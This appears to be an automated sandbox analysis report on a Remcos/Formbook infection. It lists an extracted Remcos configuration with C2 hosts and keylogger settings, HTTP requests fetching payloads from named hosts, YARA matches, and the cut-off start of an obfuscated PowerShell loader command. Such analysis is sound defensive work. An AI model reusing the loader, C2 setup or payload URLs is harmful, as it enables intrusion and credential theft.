Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: |
Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wab.exe |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
8_2_222E10F1 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 8_2_222E6580 FindFirstFileExA, |
8_2_222E6580 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, |
16_2_0040AE51 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, |
19_2_00407EF8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, |
20_2_00407898 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /Methink1.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: europrotectie.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /Detentionen.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /PUzAKuQ35.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo) |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe |
String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) |
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook) |
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo) |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl |
Source: powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl4 |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.108 |
Source: powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.mM5 |
Source: powershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microD |
Source: powershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: powershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://europrotectie.ro |
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp)B |
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp0B8 |
Source: wab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpf |
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.com |
Source: wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comata |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comr |
Source: wab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net |
Source: wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net/ |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBcq |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/ |
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.bin |
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin |
Source: wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binq( |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro/Methink1.thnP |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro/Methink1.thnXRwl |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: wab.exe |
String found in binary or memory: https://login.yahoo.com/config/login |
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: wab.exe |
String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
16_2_0040987A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
16_2_004098E2 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
19_2_00406DFC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
19_2_00406E9F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
20_2_004068B5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
20_2_004072B5 |
Source: amsi64_2132.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_2668.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5804.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_6324.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6231 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6231 |
|
Source: C:\Windows\SysWOW64\wscript.exe |
Process created: Commandline size = 6007 |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6007 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6231 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6231 |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process created: Commandline size = 6007 |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6007 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae 